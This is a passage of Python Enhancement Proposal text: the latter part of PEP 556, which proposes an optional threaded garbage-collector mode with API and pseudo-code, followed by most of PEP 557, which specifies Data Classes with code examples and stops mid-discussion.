An “implicit” GC run (or “implicit” collection) is one that is triggered
opportunistically based on a certain heuristic computed over allocation
statistics, whenever a new allocation is requested. Details of the
heuristic are not relevant to this PEP, as it does not propose to change it.
An “explicit” GC run (or “explicit” collection) is one that is requested
programmatically by an API call such as gc.collect.
“Threaded” refers to the fact that GC runs happen in a dedicated thread
separate from sequential execution of application code. It does not mean
“concurrent” (the Global Interpreter Lock, or GIL, still serializes
execution among Python threads including the dedicated GC thread)
nor “parallel” (the GC is not able to distribute its work onto several
threads at once to lower wall-clock latencies of GC runs).
Rationale
The mode of operation for the GC has always been to perform implicit
collections synchronously. That is, whenever the aforementioned heuristic
is activated, execution of application code in the current thread is
suspended and the GC is launched in order to reclaim dead reference
cycles.
There is a catch, though. Over the course of reclaiming dead reference
cycles (and any ancillary objects hanging at those cycles), the GC can
execute arbitrary finalization code in the form of __del__ methods
and weakref callbacks. Over the years, Python has been used for more
and more sophisticated purposes, and it is increasingly common for
finalization code to perform complex tasks, for example in distributed
systems where loss of an object may require notifying other (logical
or physical) nodes.
Interrupting application code at arbitrary points to execute finalization
code that may rely on a consistent internal state and/or on acquiring
synchronization primitives gives rise to reentrancy issues that even the
most seasoned experts have trouble fixing properly [1].
This PEP bases itself on the observation that, despite the apparent
similarities, same-thread reentrancy is a fundamentally harder
problem than multi-thread synchronization. Instead of letting each
developer or library author struggle with extremely hard reentrancy
issues, one by one, this PEP proposes to allow the GC to run in a
separate thread where well-known multi-thread synchronization practices
are sufficient.
Proposal
Under this PEP, the GC has two modes of operation:
“serial”, which is the default and legacy mode, where an implicit GC
run is performed immediately in the thread that detects such an implicit
run is desired (based on the aforementioned allocation heuristic).
“threaded”, which can be explicitly enabled at runtime on a per-process
basis, where implicit GC runs are scheduled whenever the allocation
heuristic is triggered, but run in a dedicated background thread.
Hard reentrancy problems which plague sophisticated uses of finalization
callbacks in the “serial” mode become relatively easy multi-thread
synchronization problems in the “threaded” mode of operation.
The GC also traditionally allows for explicit GC runs, using the Python
API gc.collect and the C API PyGC_Collect. The visible semantics
of these two APIs are left unchanged: they perform a GC run immediately
when called, and only return when the GC run is finished.
New public APIs
Two new Python APIs are added to the gc module:
gc.set_mode(mode) sets the current mode of operation (either “serial”
or “threaded”). If setting to “serial” and the current mode is
“threaded”, then the function also waits for the GC thread to end.
gc.get_mode() returns the current mode of operation.
It is allowed to switch back and forth between modes of operation.
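For illustration, here is a minimal usage sketch of the proposed API (hypothetical, since gc.set_mode and gc.get_mode do not exist yet; the mode strings are those defined above):

import gc

gc.set_mode("threaded")            # implicit collections now run in a background thread
assert gc.get_mode() == "threaded"

# ... application code runs ...

gc.set_mode("serial")              # waits for the GC thread to end before returning
assert gc.get_mode() == "serial"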
Intended use
Given the per-process nature of the switch and its repercussions on
semantics of all finalization callbacks, it is recommended that it is
set at the beginning of an application’s code (and/or in initializers
for child processes e.g. when using multiprocessing). Library functions
should probably not mess with this setting, just as they shouldn’t call
gc.enable or gc.disable, but there’s nothing to prevent them from
doing so.
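As a sketch of this recommendation (hypothetical code, again assuming the proposed gc.set_mode API), an application could enable the mode once at startup and re-enable it in each multiprocessing worker, since threads are not inherited by child processes:

import gc
import multiprocessing as mp

def _worker_init():
    # Re-enable the mode in each child: the GC thread is not inherited across fork/spawn.
    gc.set_mode("threaded")

def square(n):
    return n * n

def main():
    gc.set_mode("threaded")        # set once, early, for the whole process
    with mp.Pool(initializer=_worker_init) as pool:
        print(pool.map(square, range(10)))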
Non-goals
This PEP does not address reentrancy issues with other kinds of
asynchronous code execution (for example signal handlers registered
with the signal module). The author believes that the overwhelming
majority of painful reentrancy issues occur with finalizers. Most of the
time, signal handlers are able to set a single flag and/or wake up a
file descriptor for the main program to notice. As for those signal
handlers which raise an exception, they have to execute in-thread.
This PEP also does not change the execution of finalization callbacks
when they are called as part of regular reference counting, i.e. when
releasing a visible reference drops an object’s reference count to zero.
Since such execution happens at deterministic points in code, it is usually
not a problem.
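For example (a small illustrative snippet using current Python), a finalizer reached through reference counting keeps running at the same deterministic point whatever the GC mode; only finalizers reached through the cyclic collector would move to the GC thread in "threaded" mode:

class Resource:
    def __del__(self):
        print("finalized")

r = Resource()
del r                      # refcount drops to zero: __del__ runs immediately, in this thread

a = Resource(); b = Resource()
a.other = b; b.other = a   # reference cycle: reclaimed (and finalized) only by a GC run
del a, b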
Internal details
TODO: Update this section to conform to the current implementation.
gc module
An internal flag gc_is_threaded is added, telling whether GC is serial
or threaded.
An internal structure gc_mutex is added to avoid two GC runs at once:
static struct {
PyThread_type_lock lock; /* taken when collecting */
PyThreadState *owner; /* whichever thread is currently collecting
(NULL if no collection is taking place) */
} gc_mutex;
An internal structure gc_thread is added to handle synchronization with
the GC thread:
static struct {
PyThread_type_lock wakeup; /* acts as an event
to wake up the GC thread */
int collection_requested; /* non-zero if collection requested */
PyThread_type_lock done; /* acts as an event signaling
the GC thread has exited */
} gc_thread;
threading module
Two private functions are added to the threading module:
threading._ensure_dummy_thread(name) creates and registers a Thread
instance for the current thread with the given name, and returns it.
threading._remove_dummy_thread(thread) removes the given thread
(as returned by _ensure_dummy_thread) from the threading module’s
internal state.
The purpose of these two functions is to improve debugging and introspection
by letting threading.current_thread() return a more meaningfully-named
object when called inside a finalization callback in the GC thread.
Pseudo-code
Here is a proposed pseudo-code for the main primitives, public and internal,
required for implementing this PEP. All of them will be implemented in C
and live inside the gc module, unless otherwise noted:
def collect_with_callback(generation):
"""
Collect up to the given *generation*.
"""
# Same code as currently (see collect_with_callback() in gcmodule.c)
def collect_generations():
"""
Collect as many generations as desired by the heuristic.
"""
# Same code as currently (see collect_generations() in gcmodule.c)
def lock_and_collect(generation=-1):
"""
Perform a collection with thread safety.
"""
me = PyThreadState_GET()
if gc_mutex.owner == me:
# reentrant GC collection request, bail out
return
Py_BEGIN_ALLOW_THREADS
gc_mutex.lock.acquire()
Py_END_ALLOW_THREADS
gc_mutex.owner = me
try:
if generation >= 0:
return collect_with_callback(generation)
else:
return collect_generations()
finally:
gc_mutex.owner = NULL
gc_mutex.lock.release()
def schedule_gc_request():
"""
Ask the GC thread to run an implicit collection.
"""
assert gc_is_threaded == True
# Note this is extremely fast if a collection is already requested
if gc_thread.collection_requested == False:
gc_thread.collection_requested = True
gc_thread.wakeup.release()
def is_implicit_gc_desired():
"""
Whether an implicit GC run is currently desired based on allocation
stats. Return a generation number, or -1 if none desired.
"""
# Same heuristic as currently (see _PyObject_GC_Alloc in gcmodule.c)
def PyGC_Malloc():
"""
Allocate a GC-enabled object.
"""
# Update allocation statistics (same code as currently, omitted for brevity)
if is_implicit_gc_desired():
if gc_is_threaded:
schedule_gc_request()
else:
lock_and_collect()
# Go ahead with allocation (same code as currently, omitted for brevity)
def gc_thread(interp_state):
"""
Dedicated loop for threaded GC.
"""
# Init Python thread state (omitted, see t_bootstrap in _threadmodule.c)
# Optional: init thread in Python threading module, for better introspection
me = threading._ensure_dummy_thread(name="GC thread")
while gc_is_threaded == True:
Py_BEGIN_ALLOW_THREADS
gc_thread.wakeup.acquire()
Py_END_ALLOW_THREADS
if gc_thread.collection_requested != 0:
gc_thread.collection_requested = 0
lock_and_collect(generation=-1)
threading._remove_dummy_thread(me)
# Signal we're exiting
gc_thread.done.release()
# Free Python thread state (omitted)
def gc.set_mode(mode):
"""
Set current GC mode. This is a process-global setting.
"""
if mode == "threaded":
if not gc_is_threaded:
# Launch thread
gc_thread.done.acquire(block=False) # should not fail
gc_is_threaded = True
PyThread_start_new_thread(gc_thread)
elif mode == "serial":
if gc_is_threaded == True:
# Wake up thread, asking it to end
gc_is_threaded = False
gc_thread.wakeup.release()
# Wait for thread exit
Py_BEGIN_ALLOW_THREADS
gc_thread.done.acquire()
Py_END_ALLOW_THREADS
gc_thread.done.release()
else:
raise ValueError("unsupported mode %r" % (mode,))
def gc.get_mode():
"""
Get current GC mode.
"""
return "threaded" if gc_is_threaded else "serial"
def gc.collect(generation=2):
"""
Schedule collection of the given generation and wait for it to
finish.
"""
return lock_and_collect(generation)
Discussion
Default mode
One may wonder whether the default mode should simply be changed to “threaded”.
For multi-threaded applications, it would probably not be a problem:
those applications must already be prepared for finalization handlers to
be run in arbitrary threads. In single-thread applications, however, it
is currently guaranteed that finalizers will always be called in the main
thread. Breaking this property may induce subtle behaviour changes or bugs,
for example if finalizers rely on some thread-local values.
Another problem is when a program uses fork() for concurrency.
Calling fork() from a single-threaded program is safe,
but it’s fragile (to say the least) if the program is multi-threaded.
Explicit collections
One may ask whether explicit collections should also be delegated to the
background thread. The answer is it doesn’t really matter: since
gc.collect and PyGC_Collect actually wait for the collection to
end (breaking this property would break compatibility), delegating the
actual work to a background thread wouldn’t ease synchronization with the
thread requesting an explicit collection.
In the end, this PEP chooses the behaviour that seems simpler to implement
based on the pseudo-code above.
Impact on memory use
The “threaded” mode incurs a slight delay in implicit collections compared
to the default “serial” mode. This obviously may change the memory profile
of certain applications. By how much remains to be measured in real-world
use, but we expect the impact to remain minor and bearable. First because
implicit collections are based on a heuristic whose effect does not result
in deterministic visible behaviour anyway. Second because the GC deals
with reference cycles while many objects are reclaimed immediately when their
last visible reference disappears.
Impact on CPU consumption
The pseudo-code above adds two lock operations for each implicit collection
request in “threaded” mode: one in the thread making the request (a
release call) and one in the GC thread (an acquire call).
It also adds two other lock operations, regardless of the current mode,
around each actual collection.
We expect the cost of those lock operations to be very small, on modern
systems, compared to the actual cost of crawling through the chains of
pointers during the collection itself (“pointer chasing” being one of
the hardest workloads on modern CPUs, as it lends itself poorly to
speculation and superscalar execution).
Actual measurements on worst-case mini-benchmarks may help provide
reassuring upper bounds.
Impact on GC pauses
While this PEP does not concern itself with GC pauses, there is a
practical chance that releasing the GIL at some point during an implicit
collection (for example by virtue of executing a pure Python finalizer)
will allow application code to run in-between, lowering the visible GC
pause time for some applications.
If this PEP is accepted, future work may try to better realize this potential
by speculatively releasing the GIL during collections, though it is unclear
how doable that is.
Open issues
gc.set_mode should probably be protected against multiple concurrent
invocations. Also, it should raise when called from inside a GC run
(i.e. from a finalizer).
What happens at shutdown? Does the GC thread run until _PyGC_Fini()
is called?
Implementation
A draft implementation is available in the threaded_gc branch
[2] of the author’s Github fork [3].
References
[1]
https://bugs.python.org/issue14976
[2]
https://github.com/pitrou/cpython/tree/threaded_gc
[3]
https://github.com/pitrou/cpython/
Copyright
This document has been placed in the public domain.
| Deferred | PEP 556 – Threaded garbage collection | Standards Track | This PEP proposes a new optional mode of operation for CPython’s cyclic
garbage collector (GC) where implicit (i.e. opportunistic) collections
happen in a dedicated thread rather than synchronously. |
PEP 557 – Data Classes
Author:
Eric V. Smith <eric at trueblade.com>
Status:
Final
Type:
Standards Track
Created:
02-Jun-2017
Python-Version:
3.7
Post-History:
08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018
Resolution:
Python-Dev message
Table of Contents
Notice for Reviewers
Abstract
Rationale
Specification
Field objects
post-init processing
Class variables
Init-only variables
Frozen instances
Inheritance
Default factory functions
Mutable default values
Module level helper functions
Discussion
python-ideas discussion
Support for automatically setting __slots__?
Why not just use namedtuple?
Why not just use typing.NamedTuple?
Why not just use attrs?
post-init parameters
asdict and astuple function names
Rejected ideas
Copying init=False fields after new object creation in replace()
Automatically support mutable default values
Examples
Custom __init__ method
A complicated example
Acknowledgements
References
Copyright
Notice for Reviewers
This PEP and the initial implementation were drafted in a separate
repo: https://github.com/ericvsmith/dataclasses. Before commenting in
a public forum please at least read the discussion listed at the
end of this PEP.
Abstract
This PEP describes an addition to the standard library called Data
Classes. Although they use a very different mechanism, Data Classes
can be thought of as “mutable namedtuples with defaults”. Because
Data Classes use normal class definition syntax, you are free to use
inheritance, metaclasses, docstrings, user-defined methods, class
factories, and other Python class features.
A class decorator is provided which inspects a class definition for
variables with type annotations as defined in PEP 526, “Syntax for
Variable Annotations”. In this document, such variables are called
fields. Using these fields, the decorator adds generated method
definitions to the class to support instance initialization, a repr,
comparison methods, and optionally other methods as described in the
Specification section. Such a class is called a Data Class, but
there’s really nothing special about the class: the decorator adds
generated methods to the class and returns the same class it was
given.
As an example:
@dataclass
class InventoryItem:
'''Class for keeping track of an item in inventory.'''
name: str
unit_price: float
quantity_on_hand: int = 0
def total_cost(self) -> float:
return self.unit_price * self.quantity_on_hand
The @dataclass decorator will add the equivalent of these methods
to the InventoryItem class:
def __init__(self, name: str, unit_price: float, quantity_on_hand: int = 0) -> None:
self.name = name
self.unit_price = unit_price
self.quantity_on_hand = quantity_on_hand
def __repr__(self):
return f'InventoryItem(name={self.name!r}, unit_price={self.unit_price!r}, quantity_on_hand={self.quantity_on_hand!r})'
def __eq__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) == (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __ne__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) != (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __lt__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) < (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __le__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) <= (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __gt__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) > (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
def __ge__(self, other):
if other.__class__ is self.__class__:
return (self.name, self.unit_price, self.quantity_on_hand) >= (other.name, other.unit_price, other.quantity_on_hand)
return NotImplemented
Data Classes save you from writing and maintaining these methods.
Rationale
There have been numerous attempts to define classes which exist
primarily to store values which are accessible by attribute lookup.
Some examples include:
collections.namedtuple in the standard library.
typing.NamedTuple in the standard library.
The popular attrs [1] project.
George Sakkis’ recordType recipe [2], a mutable data type inspired
by collections.namedtuple.
Many example online recipes [3], packages [4], and questions [5].
David Beazley used a form of data classes as the motivating example
in a PyCon 2013 metaclass talk [6].
So, why is this PEP needed?
With the addition of PEP 526, Python has a concise way to specify the
type of class members. This PEP leverages that syntax to provide a
simple, unobtrusive way to describe Data Classes. With two exceptions,
the specified attribute type annotation is completely ignored by Data
Classes.
No base classes or metaclasses are used by Data Classes. Users of
these classes are free to use inheritance and metaclasses without any
interference from Data Classes. The decorated classes are truly
“normal” Python classes. The Data Class decorator should not
interfere with any usage of the class.
One main design goal of Data Classes is to support static type
checkers. The use of PEP 526 syntax is one example of this, but so is
the design of the fields() function and the @dataclass
decorator. Due to their very dynamic nature, some of the libraries
mentioned above are difficult to use with static type checkers.
Data Classes are not, and are not intended to be, a replacement
mechanism for all of the above libraries. But being in the standard
library will allow many of the simpler use cases to instead leverage
Data Classes. Many of the libraries listed have different feature
sets, and will of course continue to exist and prosper.
Where is it not appropriate to use Data Classes?
API compatibility with tuples or dicts is required.
Type validation beyond that provided by PEPs 484 and 526 is
required, or value validation or conversion is required.
Specification
All of the functions described in this PEP will live in a module named
dataclasses.
A function dataclass which is typically used as a class decorator
is provided to post-process classes and add generated methods,
described below.
The dataclass decorator examines the class to find fields. A
field is defined as any variable identified in
__annotations__. That is, a variable that has a type annotation.
With two exceptions described below, none of the Data Class machinery
examines the type specified in the annotation.
Note that __annotations__ is guaranteed to be an ordered mapping,
in class declaration order. The order of the fields in all of the
generated methods is the order in which they appear in the class.
The dataclass decorator will add various “dunder” methods to the
class, described below. If any of the added methods already exist on the
class, a TypeError will be raised. The decorator returns the same
class that it is called on: no new class is created.
The dataclass decorator is typically used with no parameters and
no parentheses. However, it also supports the following logical
signature:
def dataclass(*, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
If dataclass is used just as a simple decorator with no
parameters, it acts as if it has the default values documented in this
signature. That is, these three uses of @dataclass are equivalent:
@dataclass
class C:
...
@dataclass()
class C:
...
@dataclass(init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False)
class C:
...
The parameters to dataclass are:
init: If true (the default), a __init__ method will be
generated.
repr: If true (the default), a __repr__ method will be
generated. The generated repr string will have the class name and
the name and repr of each field, in the order they are defined in
the class. Fields that are marked as being excluded from the repr
are not included. For example:
InventoryItem(name='widget', unit_price=3.0, quantity_on_hand=10).
If the class already defines __repr__, this parameter is ignored.
eq: If true (the default), an __eq__ method will be
generated. This method compares the class as if it were a tuple of its
fields, in order. Both instances in the comparison must be of the
identical type.
If the class already defines __eq__, this parameter is ignored.
order: If true (the default is False), __lt__, __le__,
__gt__, and __ge__ methods will be generated. These compare
the class as if it were a tuple of its fields, in order. Both
instances in the comparison must be of the identical type. If
order is true and eq is false, a ValueError is raised.
If the class already defines any of __lt__, __le__,
__gt__, or __ge__, then ValueError is raised.
unsafe_hash: If False (the default), the __hash__ method
is generated according to how eq and frozen are set.
If eq and frozen are both true, Data Classes will generate a
__hash__ method for you. If eq is true and frozen is
false, __hash__ will be set to None, marking it unhashable
(which it is). If eq is false, __hash__ will be left
untouched meaning the __hash__ method of the superclass will be
used (if the superclass is object, this means it will fall back
to id-based hashing).
Although not recommended, you can force Data Classes to create a
__hash__ method with unsafe_hash=True. This might be the
case if your class is logically immutable but can nonetheless be
mutated. This is a specialized use case and should be considered
carefully.
If a class already has an explicitly defined __hash__ the
behavior when adding __hash__ is modified. An explicitly
defined __hash__ is defined when:
__eq__ is defined in the class and __hash__ is defined
with any value other than None.
__eq__ is defined in the class and any non-None
__hash__ is defined.
__eq__ is not defined on the class, and any __hash__ is
defined.
If unsafe_hash is true and an explicitly defined __hash__
is present, then ValueError is raised.
If unsafe_hash is false and an explicitly defined __hash__
is present, then no __hash__ is added.
See the Python documentation [7] for more information.
frozen: If true (the default is False), assigning to fields will
generate an exception. This emulates read-only frozen instances.
If either __getattr__ or __setattr__ is defined in the
class, then ValueError is raised. See the discussion below.
fields may optionally specify a default value, using normal
Python syntax:
@dataclass
class C:
a: int # 'a' has no default value
b: int = 0 # assign a default value for 'b'
In this example, both a and b will be included in the added
__init__ method, which will be defined as:
def __init__(self, a: int, b: int = 0):
TypeError will be raised if a field without a default value
follows a field with a default value. This is true either when this
occurs in a single class, or as a result of class inheritance.
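For example (an illustrative sketch), the following class raises TypeError when the decorator runs, because b has no default but follows a, which has one:

from dataclasses import dataclass

@dataclass
class C:
    a: int = 0
    b: int        # TypeError: a field without a default follows a field with one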
For common and simple use cases, no other functionality is required.
There are, however, some Data Class features that require additional
per-field information. To satisfy this need for additional
information, you can replace the default field value with a call to
the provided field() function. The signature of field() is:
def field(*, default=MISSING, default_factory=MISSING, repr=True,
hash=None, init=True, compare=True, metadata=None)
The MISSING value is a sentinel object used to detect if the
default and default_factory parameters are provided. This
sentinel is used because None is a valid value for default.
The parameters to field() are:
default: If provided, this will be the default value for this
field. This is needed because the field call itself replaces
the normal position of the default value.
default_factory: If provided, it must be a zero-argument
callable that will be called when a default value is needed for this
field. Among other purposes, this can be used to specify fields
with mutable default values, as discussed below. It is an error to
specify both default and default_factory.
init: If true (the default), this field is included as a
parameter to the generated __init__ method.
repr: If true (the default), this field is included in the
string returned by the generated __repr__ method.
compare: If True (the default), this field is included in the
generated equality and comparison methods (__eq__, __gt__,
et al.).
hash: This can be a bool or None. If True, this field is
included in the generated __hash__ method. If None (the
default), use the value of compare: this would normally be the
expected behavior. A field should be considered in the hash if
it’s used for comparisons. Setting this value to anything other
than None is discouraged.
One possible reason to set hash=False but compare=True would
be if a field is expensive to compute a hash value for, that field
is needed for equality testing, and there are other fields that
contribute to the type’s hash value. Even if a field is excluded
from the hash, it will still be used for comparisons.
metadata: This can be a mapping or None. None is treated as an
empty dict. This value is wrapped in types.MappingProxyType to
make it read-only, and exposed on the Field object. It is not used
at all by Data Classes, and is provided as a third-party extension
mechanism. Multiple third-parties can each have their own key, to
use as a namespace in the metadata.
If the default value of a field is specified by a call to field(),
then the class attribute for this field will be replaced by the
specified default value. If no default is provided, then the
class attribute will be deleted. The intent is that after the
dataclass decorator runs, the class attributes will all contain
the default values for the fields, just as if the default value itself
were specified. For example, after:
@dataclass
class C:
x: int
y: int = field(repr=False)
z: int = field(repr=False, default=10)
t: int = 20
The class attribute C.z will be 10, the class attribute
C.t will be 20, and the class attributes C.x and C.y
will not be set.
Field objects
Field objects describe each defined field. These objects are
created internally, and are returned by the fields() module-level
method (see below). Users should never instantiate a Field
object directly. Its documented attributes are:
name: The name of the field.
type: The type of the field.
default, default_factory, init, repr, hash,
compare, and metadata have the identical meaning and values
as they do in the field() declaration.
Other attributes may exist, but they are private and must not be
inspected or relied on.
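For illustration, a small sketch (using the InventoryItem class from the Abstract) of inspecting these attributes through the module-level fields() function described below:

from dataclasses import dataclass, fields

@dataclass
class InventoryItem:
    name: str
    unit_price: float
    quantity_on_hand: int = 0

for f in fields(InventoryItem):
    print(f.name, f.type, f.init, f.repr)   # e.g. "name <class 'str'> True True"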
post-init processing
The generated __init__ code will call a method named
__post_init__, if it is defined on the class. It will be called
as self.__post_init__(). If no __init__ method is generated,
then __post_init__ will not automatically be called.
Among other uses, this allows for initializing field values that
depend on one or more other fields. For example:
@dataclass
class C:
a: float
b: float
c: float = field(init=False)
def __post_init__(self):
self.c = self.a + self.b
See the section below on init-only variables for ways to pass
parameters to __post_init__(). Also see the warning about how
replace() handles init=False fields.
Class variables
One place where dataclass actually inspects the type of a field is
to determine if a field is a class variable as defined in PEP 526. It
does this by checking if the type of the field is typing.ClassVar.
If a field is a ClassVar, it is excluded from consideration as a
field and is ignored by the Data Class mechanisms. For more
discussion, see [8]. Such ClassVar pseudo-fields are not
returned by the module-level fields() function.
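For example (an illustrative sketch), a ClassVar annotation keeps an attribute out of the generated methods and out of fields():

from dataclasses import dataclass, fields
from typing import ClassVar

@dataclass
class Counter:
    value: int = 0
    high_water_mark: ClassVar[int] = 0    # shared class variable, not a field

assert [f.name for f in fields(Counter)] == ['value']
c = Counter(3)                            # __init__ accepts only 'value'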
Init-only variables
The other place where dataclass inspects a type annotation is to
determine if a field is an init-only variable. It does this by seeing
if the type of a field is of type dataclasses.InitVar. If a field
is an InitVar, it is considered a pseudo-field called an init-only
field. As it is not a true field, it is not returned by the
module-level fields() function. Init-only fields are added as
parameters to the generated __init__ method, and are passed to
the optional __post_init__ method. They are not otherwise used
by Data Classes.
For example, suppose a field will be initialized from a database, if a
value is not provided when creating the class:
@dataclass
class C:
i: int
j: int = None
database: InitVar[DatabaseType] = None
def __post_init__(self, database):
if self.j is None and database is not None:
self.j = database.lookup('j')
c = C(10, database=my_database)
In this case, fields() will return Field objects for i and
j, but not for database.
Frozen instances
It is not possible to create truly immutable Python objects. However,
by passing frozen=True to the @dataclass decorator you can
emulate immutability. In that case, Data Classes will add
__setattr__ and __delattr__ methods to the class. These
methods will raise a FrozenInstanceError when invoked.
There is a tiny performance penalty when using frozen=True:
__init__ cannot use simple assignment to initialize fields, and
must use object.__setattr__.
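A short illustrative sketch of frozen instances:

from dataclasses import dataclass, FrozenInstanceError

@dataclass(frozen=True)
class Point:
    x: int
    y: int

p = Point(1, 2)
try:
    p.x = 10
except FrozenInstanceError:
    pass          # assigning to a field of a frozen instance raises FrozenInstanceError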
Inheritance
When the Data Class is being created by the @dataclass decorator,
it looks through all of the class’s base classes in reverse MRO (that
is, starting at object) and, for each Data Class that it finds,
adds the fields from that base class to an ordered mapping of fields.
After all of the base class fields are added, it adds its own fields
to the ordered mapping. All of the generated methods will use this
combined, calculated ordered mapping of fields. Because the fields
are in insertion order, derived classes override base classes. An
example:
@dataclass
class Base:
x: Any = 15.0
y: int = 0
@dataclass
class C(Base):
z: int = 10
x: int = 15
The final list of fields is, in order, x, y, z. The final
type of x is int, as specified in class C.
The generated __init__ method for C will look like:
def __init__(self, x: int = 15, y: int = 0, z: int = 10):
Default factory functions
If a field specifies a default_factory, it is called with zero
arguments when a default value for the field is needed. For example,
to create a new instance of a list, use:
l: list = field(default_factory=list)
If a field is excluded from __init__ (using init=False) and
the field also specifies default_factory, then the default factory
function will always be called from the generated __init__
function. This happens because there is no other way to give the
field an initial value.
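For example (an illustrative sketch), a field excluded from __init__ can still receive a fresh mutable default on every instantiation through its factory:

from dataclasses import dataclass, field
from typing import List

@dataclass
class Basket:
    owner: str
    items: List[str] = field(init=False, default_factory=list)

b1 = Basket('alice')
b2 = Basket('bob')
assert b1.items == [] and b1.items is not b2.items   # the factory is called for each instance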
Mutable default values
Python stores default member variable values in class attributes.
Consider this example, not using Data Classes:
class C:
x = []
def add(self, element):
self.x.append(element)
o1 = C()
o2 = C()
o1.add(1)
o2.add(2)
assert o1.x == [1, 2]
assert o1.x is o2.x
Note that the two instances of class C share the same class
variable x, as expected.
Using Data Classes, if this code was valid:
@dataclass
class D:
x: List = []
def add(self, element):
self.x.append(element)
it would generate code similar to:
class D:
x = []
def __init__(self, x=x):
self.x = x
def add(self, element):
self.x.append(element)
assert D().x is D().x
This has the same issue as the original example using class C.
That is, two instances of class D that do not specify a value for
x when creating a class instance will share the same copy of
x. Because Data Classes just use normal Python class creation
they also share this problem. There is no general way for Data
Classes to detect this condition. Instead, Data Classes will raise a
TypeError if it detects a default parameter of type list,
dict, or set. This is a partial solution, but it does protect
against many common errors. See Automatically support mutable
default values in the Rejected Ideas section for more details.
Using default factory functions is a way to create new instances of
mutable types as default values for fields:
@dataclass
class D:
x: list = field(default_factory=list)
assert D().x is not D().x
Module level helper functions
fields(class_or_instance): Returns a tuple of Field objects
that define the fields for this Data Class. Accepts either a Data
Class, or an instance of a Data Class. Raises ValueError if not
passed a Data Class or instance of one. Does not return
pseudo-fields which are ClassVar or InitVar.
asdict(instance, *, dict_factory=dict): Converts the Data Class
instance to a dict (by using the factory function
dict_factory). Each Data Class is converted to a dict of its
fields, as name:value pairs. Data Classes, dicts, lists, and tuples
are recursed into. For example:
@dataclass
class Point:
x: int
y: int
@dataclass
class C:
l: List[Point]
p = Point(10, 20)
assert asdict(p) == {'x': 10, 'y': 20}
c = C([Point(0, 0), Point(10, 4)])
assert asdict(c) == {'l': [{'x': 0, 'y': 0}, {'x': 10, 'y': 4}]}
Raises TypeError if instance is not a Data Class instance.
astuple(instance, *, tuple_factory=tuple): Converts the Data Class
instance to a tuple (by using the factory function
tuple_factory). Each Data Class is converted to a tuple of its
field values. Data Classes, dicts, lists, and tuples are recursed
into.
Continuing from the previous example:
assert astuple(p) == (10, 20)
assert astuple(c) == ([(0, 0), (10, 4)],)
Raises TypeError if instance is not a Data Class instance.
make_dataclass(cls_name, fields, *, bases=(), namespace=None):
Creates a new Data Class with name cls_name, fields as defined
in fields, base classes as given in bases, and initialized
with a namespace as given in namespace. fields is an
iterable whose elements are either name, (name, type), or
(name, type, Field). If just name is supplied,
typing.Any is used for type. This function is not strictly
required, because any Python mechanism for creating a new class with
__annotations__ can then apply the dataclass function to
convert that class to a Data Class. This function is provided as a
convenience. For example:
C = make_dataclass('C',
[('x', int),
'y',
('z', int, field(default=5))],
namespace={'add_one': lambda self: self.x + 1})
Is equivalent to:
@dataclass
class C:
x: int
y: 'typing.Any'
z: int = 5
def add_one(self):
return self.x + 1
replace(instance, **changes): Creates a new object of the same
type of instance, replacing fields with values from changes.
If instance is not a Data Class, raises TypeError. If
values in changes do not specify fields, raises TypeError.
The newly returned object is created by calling the __init__
method of the Data Class. This ensures that
__post_init__, if present, is also called.
Init-only variables without default values, if any exist, must be
specified on the call to replace so that they can be passed to
__init__ and __post_init__.
It is an error for changes to contain any fields that are
defined as having init=False. A ValueError will be raised
in this case.
Be forewarned about how init=False fields work during a call to
replace(). They are not copied from the source object, but
rather are initialized in __post_init__(), if they’re
initialized at all. It is expected that init=False fields will
be rarely and judiciously used. If they are used, it might be wise
to have alternate class constructors, or perhaps a custom
replace() (or similarly named) method which handles instance
copying.
is_dataclass(class_or_instance): Returns True if its parameter
is a dataclass or an instance of one, otherwise returns False.
If you need to know if a class is an instance of a dataclass (and
not a dataclass itself), then add a further check for not
isinstance(obj, type):
def is_dataclass_instance(obj):
return is_dataclass(obj) and not isinstance(obj, type)
Discussion
python-ideas discussion
This discussion started on python-ideas [9] and was moved to a GitHub
repo [10] for further discussion. As part of this discussion, we made
the decision to use PEP 526 syntax to drive the discovery of fields.
Support for automatically setting __slots__?
At least for the initial release, __slots__ will not be supported.
__slots__ needs to be added at class creation time. The Data
Class decorator is called after the class is created, so in order to
add __slots__ the decorator would have to create a new class, set
__slots__, and return it. Because this behavior is somewhat
surprising, the initial version of Data Classes will not support
automatically setting __slots__. There are a number of
workarounds:
Manually add __slots__ in the class definition.
Write a function (which could be used as a decorator) that inspects
the class using fields() and creates a new class with
__slots__ set.
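As a sketch of the second workaround (a hypothetical helper, not part of this PEP), such a decorator could rebuild the class with __slots__ computed from fields():

from dataclasses import dataclass, fields

def add_slots(cls):
    # Rebuild the class with __slots__ derived from its fields; apply on top of @dataclass.
    cls_dict = dict(cls.__dict__)
    field_names = tuple(f.name for f in fields(cls))
    cls_dict['__slots__'] = field_names
    for name in field_names:
        cls_dict.pop(name, None)          # drop class-level defaults held as class attributes
    cls_dict.pop('__dict__', None)        # the rebuilt class must not keep the old __dict__ descriptor
    cls_dict.pop('__weakref__', None)     # nor the old __weakref__ descriptor
    new_cls = type(cls)(cls.__name__, cls.__bases__, cls_dict)
    new_cls.__qualname__ = getattr(cls, '__qualname__', cls.__name__)
    return new_cls

@add_slots
@dataclass
class Point:
    x: int
    y: int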
For more discussion, see [11].
Why not just use namedtuple?
Any namedtuple can be accidentally compared to any other with the
same number of fields. For example: Point3D(2017, 6, 2) ==
Date(2017, 6, 2). With Data Classes, this would return False.
A namedtuple can be accidentally compared to a tuple. For example,
Point2D(1, 10) == (1, 10). With Data Classes, this would return
False.
Instances are always iterable, which can make it difficult to add
